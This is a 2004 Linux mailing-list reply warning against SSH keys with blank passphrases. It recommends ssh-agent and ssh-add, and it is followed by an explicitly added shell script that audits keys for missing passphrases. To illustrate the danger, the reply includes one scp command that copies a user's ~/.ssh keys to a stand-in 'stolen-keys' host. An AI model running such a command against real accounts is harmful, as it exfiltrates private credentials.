tlug.jp Mailing List Archive
Re: [tlug] Problems with scp anyone knows?
- Date: Fri, 30 Jan 2004 12:53:41 +0900
- From: "Stephen J. Turnbull" <stephen@example.com>
- Subject: Re: [tlug] Problems with scp anyone knows?
- References: <opr2j94rtt0fabl5@example.com><002301c3e6d5$4561b680$3000a8c0@example.com><20040130022339.GB1419@example.com>
- Organization: The XEmacs Project
- User-agent: Gnus/5.1002 (Gnus v5.10.2) XEmacs/21.5 (celeriac, linux)
>>>>> "Scott" == Scott <scottro@example.com> writes:

    Scott> It'll ask for a password you hit enter to leave password
    Scott> blank. It'll ask for confirmation.

Bad idea. This is even worse than leaving a key in a little magnetic
box stuck under your car's bumper, since it's trivial to do

    scp ~/.ssh/* 'craven@example.com:~/stolen-keys/'

and the cracker can use your id without ever leaving the comfort of
home.

Use a password, and then

    $ eval `ssh-agent`
    $ ssh-add

Most modern distros will automatically run ssh-agent for you when you
log in or start an X session. If not, just put the above in the
relevant rc files.

    Scott> I only use this on a few boxes where I'm going back and
    Scott> forth on an internal network and have no idea if there are
    Scott> major security implications with this method.

Now you know. Unless physical security is _very_ good on that box
(ie, start by installing a coffee maker and a urinal, so you never
have to leave it), your network security is near zero, and that's a
permanent loss once it happens.

Even with the ssh-agent, if you have to leave your box unattended for
more than 60 seconds at a time or so, see the man page for ssh-add,
specifically options -D, -x, and -t.

If you use PGP/GPG as well, there's something out there called
"quintuple-agent" or something like that which will manage all your
private keys and knows how to deal with all the different protocols.

-- 
Institute of Policy and Planning Sciences     http://turnbull.sk.tsukuba.ac.jp
University of Tsukuba                    Tennodai 1-1-1 Tsukuba 305-8573 JAPAN
               Ask not how you can "do" free software business;
              ask what your business can "do for" free software.
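Added example, not part of the original message: a shell check that flags private keys saved with a blank passphrase, the setup the reply above warns against. The function names `key_protection` and `audit_keys` are made up for this example, and it assumes a userland with `base64 -d` and `head -c` (GNU, BSD or BusyBox).

```shell
#!/bin/sh
# Added example: report private keys stored without a passphrase.
# It inspects only the file header and never needs the passphrase.
# Usage (after sourcing this file): audit_keys "$HOME/.ssh"

magic=6f70656e7373682d6b65792d763100    # hex of "openssh-key-v1\0"

# key_protection FILE -> prints encrypted | unencrypted | not-a-key
key_protection() {
    case $(head -n 1 "$1" 2>/dev/null) in
    "-----BEGIN OPENSSH PRIVATE KEY-----")
        # After the magic comes a 4-byte length and the cipher name;
        # length 4 with name "none" means the key has no passphrase.
        hex=$(grep -v '^-----' "$1" | base64 -d 2>/dev/null |
              head -c 23 | od -An -tx1 | tr -d ' \t\n')
        case $hex in
        "$magic"000000046e6f6e65) echo unencrypted ;;
        "$magic"*) echo encrypted ;;
        *) echo not-a-key ;;
        esac ;;
    "-----BEGIN ENCRYPTED PRIVATE KEY-----")
        echo encrypted ;;                 # PKCS#8, encrypted
    "-----BEGIN PRIVATE KEY-----")
        echo unencrypted ;;               # PKCS#8, plaintext
    "-----BEGIN "*" PRIVATE KEY-----")
        # Legacy PEM (RSA/DSA/EC): encrypted keys carry a Proc-Type header.
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
            echo encrypted
        else
            echo unencrypted
        fi ;;
    *) echo not-a-key ;;
    esac
}

# audit_keys DIR -> lists unencrypted keys in DIR; returns 1 if any exist
audit_keys() {
    found=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if [ "$(key_protection "$f")" = unencrypted ]; then
            echo "NO PASSPHRASE: $f"
            found=1
        fi
    done
    return "$found"
}
```

A key flagged here can be given a passphrase in place with `ssh-keygen -p -f <keyfile>`, after which `ssh-agent` and `ssh-add` restore the convenience.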